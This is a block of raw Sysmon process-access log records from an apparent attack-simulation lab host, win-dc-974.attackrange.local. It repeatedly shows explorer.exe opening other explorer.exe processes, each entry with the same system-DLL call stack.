16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236199Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236198Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236197Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236196Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236195Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236194Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236193Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236192Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236191Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236190Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236189Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236188Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236187Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236186Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236185Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236184Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236183Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236182Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236181Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236180Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:29.668{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002236179Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 